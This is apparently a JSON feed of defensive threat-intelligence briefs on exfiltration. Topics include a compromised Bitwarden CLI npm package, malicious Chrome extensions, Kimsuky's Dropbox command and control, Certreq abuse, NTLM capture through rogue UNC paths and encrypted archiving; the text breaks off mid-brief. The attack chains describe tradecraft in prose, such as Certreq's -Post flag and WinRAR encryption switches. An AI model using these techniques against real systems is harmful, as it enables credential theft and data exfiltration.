{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/exfiltration/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Bitwarden CLI"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","exfiltration","npm"],"_cs_type":"advisory","_cs_vendors":["Bitwarden"],"content_html":"\u003cp\u003eA compromised Bitwarden CLI npm package allows a remote, anonymous attacker to steal credentials and exfiltrate sensitive information. The specific version of the compromised package is not detailed in the advisory. This supply chain attack targets developers and users who rely on the Bitwarden CLI for managing their passwords and secrets. This attack has the potential to expose sensitive credentials, leading to unauthorized access to systems and data. Defenders need to monitor for unusual activity related to the Bitwarden CLI and its usage within their environments to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises a Bitwarden CLI npm package through techniques such as typosquatting, account compromise, or dependency confusion.\u003c/li\u003e\n\u003cli\u003eUnsuspecting developers or users download and install the compromised package from the npm registry.\u003c/li\u003e\n\u003cli\u003eDuring installation, the malicious package executes malicious code injected by the attacker.\u003c/li\u003e\n\u003cli\u003eThe malicious code collects Bitwarden credentials and other sensitive information stored in the CLI\u0026rsquo;s configuration.\u003c/li\u003e\n\u003cli\u003eThe compromised package establishes a covert communication channel (e.g., HTTPS) to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eStolen credentials and sensitive information are exfiltrated to the attacker\u0026rsquo;s server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to access victim\u0026rsquo;s Bitwarden vaults or other systems.\u003c/li\u003e\n\u003cli\u003eThe attacker may further escalate privileges and compromise additional systems within the victim\u0026rsquo;s environment using the stolen credentials.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation leads to the theft of sensitive credentials and information stored within Bitwarden CLI. The number of victims is currently unknown. Organizations using the compromised package could experience unauthorized access to critical systems, data breaches, and potential financial losses. The targeted sectors are broad, encompassing any organization utilizing the Bitwarden CLI for password management and secret storage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for unusual activity or unexpected dependencies using process creation logs and file integrity monitoring.\u003c/li\u003e\n\u003cli\u003eImplement strict code review processes for all third-party dependencies, especially those related to security tools like Bitwarden CLI.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting suspicious network connections from the Bitwarden CLI executable to identify potential data exfiltration.\u003c/li\u003e\n\u003cli\u003eEnforce multi-factor authentication (MFA) on Bitwarden accounts to mitigate the impact of credential theft.\u003c/li\u003e\n\u003cli\u003eRegularly audit and review the permissions and access rights associated with Bitwarden CLI credentials.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T11:28:56Z","date_published":"2026-05-04T11:28:56Z","id":"/briefs/2026-05-bitwarden-cli-compromise/","summary":"A remote attacker can exploit a compromised Bitwarden CLI npm package to steal credentials and exfiltrate sensitive information.","title":"Compromised Bitwarden CLI npm Package Enables Credential Theft and Information Exfiltration","url":"https://feed.craftedsignal.io/briefs/2026-05-bitwarden-cli-compromise/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["chrome-extension","credential-theft","backdoor","ad-injection","exfiltration"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA coordinated campaign involving 108 malicious Chrome extensions has been discovered. These extensions, distributed through five accounts (GameGen, InterAlt, SideGames, Rodeo Games, and Yana Project), are designed to steal user data, inject ads, and create backdoors. Over 20,000 users have installed these extensions. The extensions provide expected functionality to avoid suspicion, but malicious code runs in the background, communicating with a shared C\u0026amp;C infrastructure to perform nefarious activities. The extensions target various user types by masquerading as Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and page utility extensions. This campaign poses a significant threat to user privacy and system security.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUsers install malicious Chrome extensions from the Chrome Web Store, believing they are legitimate tools (e.g., Telegram clients, games, enhancers).\u003c/li\u003e\n\u003cli\u003eUpon installation, the extensions execute JavaScript code in the background.\u003c/li\u003e\n\u003cli\u003eExtensions designed for credential theft acquire Google OAuth2 Bearer tokens and exfiltrate user information (email, name, profile picture) to a remote server.\u003c/li\u003e\n\u003cli\u003eExtensions targeting Telegram steal the active Telegram Web session by overwriting local storage with attacker-supplied data and force-reloading Telegram.\u003c/li\u003e\n\u003cli\u003eSome extensions contain a backdoor that opens an arbitrary URL received from the C\u0026amp;C server in a new tab upon browser start.\u003c/li\u003e\n\u003cli\u003eOther malicious activities include injecting ads into YouTube and TikTok pages, injecting content scripts into all visited pages, or proxying translation requests through attacker-controlled servers.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to user accounts (Google, Telegram) and can inject malicious content, redirect traffic, and steal sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eOver 20,000 users have been affected by these malicious extensions. The campaign targets a broad range of users by using different categories of extensions. Successful exploitation can lead to stolen credentials, account takeover, data exfiltration, ad fraud, and the ability to inject arbitrary content into visited websites. The compromised systems could be used for further malicious activities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network connections originating from Chrome extensions for connections to unusual or suspicious domains using a network connection rule (see example rule below).\u003c/li\u003e\n\u003cli\u003eImplement strict policies for Chrome extension installations, including whitelisting approved extensions and blocking installation from untrusted sources.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect the execution of scripts from the malicious extensions to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-16T12:00:00Z","date_published":"2026-04-16T12:00:00Z","id":"/briefs/2026-04-chrome-extension-backdoor/","summary":"A coordinated campaign uses 108 malicious Chrome extensions to steal user data, inject ads, and establish backdoors on over 20,000 systems via a shared command-and-control infrastructure.","title":"Malicious Chrome Extensions Stealing Data and Opening Backdoors","url":"https://feed.craftedsignal.io/briefs/2026-04-chrome-extension-backdoor/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["github","exfiltration","code_repository"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis alert identifies potential data exfiltration from GitHub via rapid repository cloning. Attackers often target code repositories to steal proprietary code, embedded secrets, and build artifacts. This activity can be indicative of a compromised personal access token (PAT) being used in a script to enumerate and clone repositories from a CI runner or cloud VM. Private and internal repositories are particularly attractive targets, as they often contain sensitive information. The alert focuses on detecting unusual patterns of bulk cloning within a short timeframe, allowing defenders to respond quickly before significant data loss occurs. The original rule was created on 2025/12/16 and updated on 2026/04/10. This activity is often associated with supply chain attacks and the compromise of CI/CD pipelines, similar to the Shai Hulud attacks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains unauthorized access to a GitHub account or obtains a valid, but misused, Personal Access Token (PAT).\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised credentials to authenticate to the GitHub API.\u003c/li\u003e\n\u003cli\u003eThe attacker script enumerates accessible repositories within the organization, identifying potential targets.\u003c/li\u003e\n\u003cli\u003eA script is executed to initiate a high volume of \u003ccode\u003egit clone\u003c/code\u003e operations against the targeted repositories.\u003c/li\u003e\n\u003cli\u003eRepositories, including private and internal ones, are cloned to a staging area, often a CI runner or cloud VM.\u003c/li\u003e\n\u003cli\u003eThe cloned data is compressed and staged for exfiltration, potentially involving archiving or large outbound transfers.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates the cloned data to an external location, potentially via a web service or other covert channel.\u003c/li\u003e\n\u003cli\u003eThe exfiltrated data is used for malicious purposes, such as reverse engineering, finding vulnerabilities, or selling sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exfiltration of GitHub repositories can lead to the exposure of sensitive source code, trade secrets, and proprietary algorithms. This can result in significant financial losses, reputational damage, and competitive disadvantage. In the event of secrets exposure (API keys, passwords, etc.), downstream systems and services may also be compromised. Depending on the nature of the exfiltrated code, legal and regulatory repercussions are also possible. Mass cloning of dozens of repositories can quickly siphon proprietary code, embedded secrets, and build artifacts across teams before defenses can respond.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eGithub Exfiltration via High Number of Clones in Short Time\u003c/code\u003e to your SIEM and tune the threshold (event_count \u0026gt;= 25) for your environment to reduce false positives based on legitimate automated activity.\u003c/li\u003e\n\u003cli\u003eMonitor GitHub audit logs for \u003ccode\u003egit.clone\u003c/code\u003e events, focusing on users with a high number of clones within a short timeframe to catch suspicious activity.\u003c/li\u003e\n\u003cli\u003eRevoke any GitHub tokens identified as being used for mass cloning, and force password resets and 2FA re-verification for the associated user accounts.\u003c/li\u003e\n\u003cli\u003eInvestigate the originating host (identified by the \u003ccode\u003eagent.id\u003c/code\u003e or \u003ccode\u003euser_agent\u003c/code\u003e fields) for signs of compromise and block/quarantine it to prevent further exfiltration.\u003c/li\u003e\n\u003cli\u003eImplement organization-wide SAML SSO, disallow classic PATs, and enforce IP allowlisting for PAT use to enhance security posture.\u003c/li\u003e\n\u003cli\u003eEnable secret scanning with push protection on all repositories to prevent accidental or intentional exposure of credentials.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T17:40:11Z","date_published":"2026-04-10T17:40:11Z","id":"/briefs/2026-06-github-exfiltration/","summary":"A single user rapidly cloning a high number of GitHub repositories indicates potential exfiltration of sensitive data such as proprietary code, embedded secrets, and build artifacts.","title":"GitHub Exfiltration via High Number of Repository Clones","url":"https://feed.craftedsignal.io/briefs/2026-06-github-exfiltration/"},{"_cs_actors":["Kimsuky","Black Banshee","Velvet Chollima","Emerald Sleet","Thallium"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["kimsuky","dropbox","api","command-and-control","exfiltration"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eKimsuky, a North Korean APT group, has been observed utilizing malware that leverages the Dropbox API for command and control (C2). This allows the malware to blend in with legitimate network traffic, making detection more challenging. The malware uses the Dropbox API to upload stolen data and download commands from the attackers. This method provides a covert channel for exfiltration and control, bypassing traditional network-based security measures. The group has been known to target South Korean entities, but the scope of targeting may extend beyond this region. This technique has been observed starting in early 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial access is gained through an unconfirmed vector, such as spear phishing or watering hole attacks, delivering an initial downloader.\u003c/li\u003e\n\u003cli\u003eThe downloader executes and establishes persistence, potentially by creating scheduled tasks or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe malware initializes the Dropbox API, authenticating with stolen or embedded API keys.\u003c/li\u003e\n\u003cli\u003eThe malware enumerates files on the compromised system, targeting documents, credentials, and other sensitive data.\u003c/li\u003e\n\u003cli\u003eStolen data is compressed and encrypted before being uploaded to a designated Dropbox folder controlled by the attacker, using the Dropbox API.\u003c/li\u003e\n\u003cli\u003eThe malware periodically checks the attacker\u0026rsquo;s Dropbox folder for new commands, also using the Dropbox API.\u003c/li\u003e\n\u003cli\u003eDownloaded commands are decrypted and executed on the compromised system, enabling actions such as remote code execution or further data exfiltration.\u003c/li\u003e\n\u003cli\u003eThe cycle of data exfiltration and command execution continues, allowing the attacker to maintain persistent access and control over the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful attacks can lead to significant data breaches, intellectual property theft, and espionage. Kimsuky\u0026rsquo;s targeting of South Korean entities suggests a focus on political and strategic intelligence gathering. The use of Dropbox as a C2 channel allows the attackers to remain undetected for extended periods, maximizing the impact of the compromise. The number of victims is currently unknown, but the potential for widespread compromise is high.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network traffic for unusual API calls to Dropbox, especially from unknown or suspicious processes (see: \u0026ldquo;Detect Suspicious Dropbox API Usage\u0026rdquo; Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and monitoring for Dropbox API usage within the organization.\u003c/li\u003e\n\u003cli\u003eInvestigate and block any suspicious processes attempting to access Dropbox API endpoints.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T12:00:00Z","date_published":"2026-03-19T12:00:00Z","id":"/briefs/2026-03-kimsuky-dropbox-api/","summary":"Kimsuky is using malware that leverages the Dropbox API for command and control, enabling file exfiltration and remote code execution.","title":"Kimsuky Malware Using Dropbox API for Command and Control","url":"https://feed.craftedsignal.io/briefs/2026-03-kimsuky-dropbox-api/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Sysmon Event ID 1 - Process Creation","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["lolbin","command-and-control","exfiltration","certreq"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThe Windows Certreq utility is a command-line tool used for managing certificates. Adversaries may abuse Certreq to download files from or upload data to a remote server by initiating an HTTP POST request. This behavior can be used for command and control (C2) or exfiltration. This technique leverages a legitimate system binary (LOLBin) to evade detection. Elastic has observed this behavior being detected through multiple data sources including Elastic Defend, Microsoft Defender XDR, Sysmon, SentinelOne, and Crowdstrike. This is a cross-industry threat that can affect any organization using Windows.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes Certreq.exe with the \u003ccode\u003e-Post\u003c/code\u003e argument to initiate an HTTP POST request.\u003c/li\u003e\n\u003cli\u003eThe Certreq process attempts to connect to a remote server to send or receive data.\u003c/li\u003e\n\u003cli\u003eThe remote server responds to the Certreq request, potentially delivering a file or receiving exfiltrated data.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to disk (if applicable).\u003c/li\u003e\n\u003cli\u003eThe attacker may execute the downloaded file or further process the exfiltrated data.\u003c/li\u003e\n\u003cli\u003eThe attacker may attempt to clean up the Certreq command from command history or logs to evade detection.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation could lead to the download and execution of malicious payloads, potentially compromising the affected system and network. Alternatively, sensitive data could be exfiltrated from the target environment. The impact can range from data theft and system compromise to full network intrusion, depending on the attacker\u0026rsquo;s objectives and the data accessed. The severity is medium because Certreq is a legitimate tool, and its abuse requires specific command-line arguments and network activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Certreq HTTP Post Request\u0026rdquo; to your SIEM to identify potential abuse of Certreq for file transfer.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture the execution of Certreq.exe and its command-line arguments, enabling detections.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from Certreq.exe for unusual destinations or data transfer patterns using network connection logs.\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of Certreq.exe executing with the \u003ccode\u003e-Post\u003c/code\u003e argument, as this is not typical usage of the utility.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-28T20:47:00Z","date_published":"2024-01-28T20:47:00Z","id":"/briefs/2024-01-certreq-post/","summary":"Adversaries may abuse the Windows Certreq utility to download files or upload data to a remote URL by making an HTTP POST request, potentially for command and control or exfiltration, which can be detected by monitoring process execution events.","title":"Potential Abuse of Certreq for File Transfer via HTTP POST","url":"https://feed.craftedsignal.io/briefs/2024-01-certreq-post/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["exfiltration","credential-access","windows","smb","ntlm"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection strategy focuses on identifying unusual Server Message Block (SMB) traffic that originates from internal IP addresses and connects to external networks. The SMB protocol, commonly used for file and printer sharing within a network, can be exploited to exfiltrate data by injecting rogue UNC paths to capture NTLM credentials. This activity is often associated with threat actors attempting to steal credentials for lateral movement or data exfiltration. Defenders should be aware of this technique as it allows adversaries to bypass traditional security controls by leveraging a legitimate protocol for malicious purposes. This detection is relevant for environments utilizing Windows operating systems and SMB for internal network communications. The goal is to identify and alert on SMB connections to external IPs, excluding known safe ranges and legitimate business applications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker compromises an internal system via phishing or other means (not detailed in source).\u003c/li\u003e\n\u003cli\u003eThe attacker injects a rogue UNC path into a document, email, or other medium.\u003c/li\u003e\n\u003cli\u003eA user opens the malicious document or clicks the injected link, triggering an SMB connection to a malicious external server.\u003c/li\u003e\n\u003cli\u003eThe SMB connection attempts to authenticate with the user\u0026rsquo;s NTLM credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker captures the NTLM hash from the authentication attempt.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to crack the NTLM hash to obtain the user\u0026rsquo;s password.\u003c/li\u003e\n\u003cli\u003eUsing the cracked password, the attacker gains unauthorized access to other systems and resources on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to credential theft, allowing attackers to gain unauthorized access to sensitive data and systems within the organization. This can result in data breaches, financial losses, and reputational damage. The impact is significant because SMB is a common protocol within many Windows environments, making this technique highly effective if not properly monitored.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect SMB Connection to External IP\u0026rdquo; to your SIEM to identify potentially malicious SMB connections to the internet. Tune the rule by excluding known good external IPs used by legitimate services.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 3 (Network Connection) with proper filtering to capture SMB traffic details as recommended in the linked setup guide, to enhance the fidelity of the detection.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to restrict SMB traffic to only necessary internal communications, reducing the attack surface and mitigating the risk of external exposure.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-25T12:00:00Z","date_published":"2024-01-25T12:00:00Z","id":"/briefs/2024-01-rare-smb-exfiltration/","summary":"This brief details a detection strategy for rare SMB connections originating from internal networks to the internet, potentially indicating NTLM credential theft via rogue UNC path injection.","title":"Detecting Rare SMB Connections for Potential NTLM Credential Theft","url":"https://feed.craftedsignal.io/briefs/2024-01-rare-smb-exfiltration/"},{"_cs_actors":["BadPatch"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["low"],"_cs_tags":["command-and-control","exfiltration","network-traffic"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eThis detection rule identifies suspicious SMTP activity occurring over TCP port 26. While standard SMTP traffic typically uses port 25, port 26 is sometimes used as an alternative to avoid conflicts or restrictions. The BadPatch malware family has been known to leverage port 26 for command and control (C2) communications with compromised Windows systems. This activity is considered suspicious because legitimate uses of SMTP on port 26 are less common and can indicate malicious activity, such as covert C2 channels used by malware like BadPatch. The rule analyzes network traffic to detect SMTP communication occurring on this non-standard port, helping to identify potential infections or unauthorized network activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial infection occurs via an unspecified method (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eMalware establishes a foothold on the compromised system.\u003c/li\u003e\n\u003cli\u003eMalware configures itself to use SMTP on port 26 for C2 communications.\u003c/li\u003e\n\u003cli\u003eThe infected host initiates a TCP connection to a remote server on port 26.\u003c/li\u003e\n\u003cli\u003eThe malware sends commands to the infected host over the SMTP connection on port 26.\u003c/li\u003e\n\u003cli\u003eThe infected host executes the received commands.\u003c/li\u003e\n\u003cli\u003eThe malware may exfiltrate data to the remote server over the SMTP connection on port 26.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised systems may be remotely controlled by attackers, leading to data theft, malware propagation, or further malicious activities. The use of non-standard ports like 26 can help attackers evade detection. If successful, an attacker can maintain persistence and control over the compromised system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SMTP Traffic on TCP Port 26\u003c/code\u003e to your SIEM and tune for your environment to detect potential command and control activity.\u003c/li\u003e\n\u003cli\u003eInvestigate any network connections on TCP port 26 to identify potentially malicious SMTP traffic.\u003c/li\u003e\n\u003cli\u003eReview network traffic logs focusing on \u003ccode\u003enetwork_traffic.flow\u003c/code\u003e or \u003ccode\u003ezeek.smtp\u003c/code\u003e events to detect unusual patterns associated with TCP port 26.\u003c/li\u003e\n\u003cli\u003eImplement firewall rules to block unauthorized SMTP traffic on port 26.\u003c/li\u003e\n\u003cli\u003eExamine source and destination IP addresses of traffic on port 26, and correlate with threat intelligence sources to identify known malicious actors as per the references.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-smtp-port-26/","summary":"This rule detects SMTP traffic on TCP port 26, an alternative to the standard port 25 that the BadPatch malware family has used for command and control of Windows systems.","title":"Suspicious SMTP Activity on Port 26/TCP","url":"https://feed.craftedsignal.io/briefs/2024-01-03-smtp-port-26/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["collection","archive","exfiltration","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eAttackers frequently compress and encrypt data before exfiltration to reduce the amount of data being sent over the network and to obfuscate the contents. This behavior often indicates a later stage of intrusion where the attacker has already collected sensitive data and is preparing to move it out of the environment. The use of archiving tools like WinRAR and 7-Zip with encryption flags can help attackers to hide their activities, making it more difficult for defenders to identify and respond to data theft. This technique has been observed in multiple threat actors including Turla as documented by WeLiveSecurity. This brief focuses on detecting command-line activity indicative of archive creation with encryption using WinRAR or 7-Zip on Windows systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e The attacker gains initial access to the system through methods such as phishing, exploiting vulnerabilities, or using stolen credentials.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Access:\u003c/strong\u003e The attacker attempts to obtain credentials using techniques such as Mimikatz or credential dumping.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDiscovery:\u003c/strong\u003e The attacker performs reconnaissance to identify sensitive data and systems of interest.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Collection:\u003c/strong\u003e The attacker gathers sensitive data from various locations on the compromised system or network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eArchive Creation:\u003c/strong\u003e The attacker uses WinRAR or 7-Zip to create an encrypted archive of the collected data using command-line arguments like \u003ccode\u003e-hp\u003c/code\u003e, \u003ccode\u003e-p\u003c/code\u003e, \u003ccode\u003e/hp\u003c/code\u003e, or \u003ccode\u003e/p\u003c/code\u003e with \u003ccode\u003erar.exe\u003c/code\u003e or \u003ccode\u003eWinRAR.exe\u003c/code\u003e or \u003ccode\u003e-p*\u003c/code\u003e with \u003ccode\u003e7z.exe\u003c/code\u003e or \u003ccode\u003e7za.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Staging:\u003c/strong\u003e The encrypted archive is moved to a staging location, such as a temporary directory or removable media.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExfiltration:\u003c/strong\u003e The attacker exfiltrates the encrypted archive from the network using various methods, such as FTP, SCP, or cloud storage services.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCovering Tracks:\u003c/strong\u003e The attacker deletes the archive from the staging location to remove evidence of the activity.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the exfiltration of sensitive data, including personally identifiable information (PII), financial records, intellectual property, and other confidential information. This can result in significant financial losses, reputational damage, legal liabilities, and regulatory fines for the victim organization. The number of victims and specific sectors targeted will vary depending on the attacker\u0026rsquo;s objectives and the nature of the compromised data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Encrypting Files with WinRar or 7z - CommandLine\u0026rdquo; to your SIEM to detect the execution of WinRAR or 7-Zip with encryption parameters (rule:Detect Encrypting Files with WinRar or 7z - CommandLine).\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line arguments in Sysmon to ensure the necessary data is available for detection (Data Source: Sysmon).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules to determine the scope and impact of the potential data exfiltration attempt (rule:Detect Encrypting Files with WinRar or 7z - CommandLine).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual outbound connections, particularly to cloud storage services or other external destinations, that may indicate data exfiltration.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-winrar-7zip-encryption/","summary":"Adversaries use WinRAR or 7-Zip with encryption options to compress and protect stolen data before exfiltration, making detection more challenging.","title":"Detection of Encrypted Archive Creation with WinRAR or 7-Zip","url":"https://feed.craftedsignal.io/briefs/2024-01-winrar-7zip-encryption/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["initial-access","exfiltration","network"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThe provided Elastic rule identifies instances of Server Message Block (SMB), also known as Windows File Sharing, being transmitted to external IP addresses. SMB is intended for internal network communication for file, printer, and resource sharing. Exposing SMB to the internet presents a significant security risk. Threat actors frequently target and exploit SMB for initial access, deploying backdoors, or exfiltrating sensitive data. This activity warrants immediate investigation as it violates best practices and poses a direct threat to network security. The rule focuses on traffic on TCP ports 139 and 445, originating from internal IP ranges and destined for external IPs, excluding known safe IP ranges, as defined by IANA. The rule was last updated April 24, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn internal host is compromised, often through phishing or other social engineering techniques.\u003c/li\u003e\n\u003cli\u003eThe compromised host attempts to establish an SMB connection to an external IP address on TCP ports 139 or 445.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the SMB protocol to attempt authentication, potentially exploiting vulnerabilities like credential stuffing or known SMB exploits.\u003c/li\u003e\n\u003cli\u003eUpon successful authentication or exploitation, the attacker gains unauthorized access to shared resources or system services on the external system.\u003c/li\u003e\n\u003cli\u003eThe attacker may upload malicious payloads, such as malware or backdoors, via the SMB connection to the external host.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the SMB protocol to exfiltrate sensitive data from the internal network to the external system.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence on the compromised internal host, using SMB for command and control or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromising SMB services can lead to significant data breaches, system compromise, and potential ransomware deployment. Exposed SMB services allow attackers to gain unauthorized access to sensitive files, critical infrastructure, and internal network resources. Successful exploitation can result in complete system takeover, data exfiltration, and disruption of business operations. While the exact number of victims is unknown, the prevalence of SMB vulnerabilities and misconfigurations suggests a widespread risk across various sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect SMB traffic to the internet and tune for your environment.\u003c/li\u003e\n\u003cli\u003eReview firewall and network configurations to ensure SMB traffic is not allowed to the Internet, and block any unauthorized outbound SMB traffic on ports 139 and 445, as identified by the rule description.\u003c/li\u003e\n\u003cli\u003eInvestigate the source IP 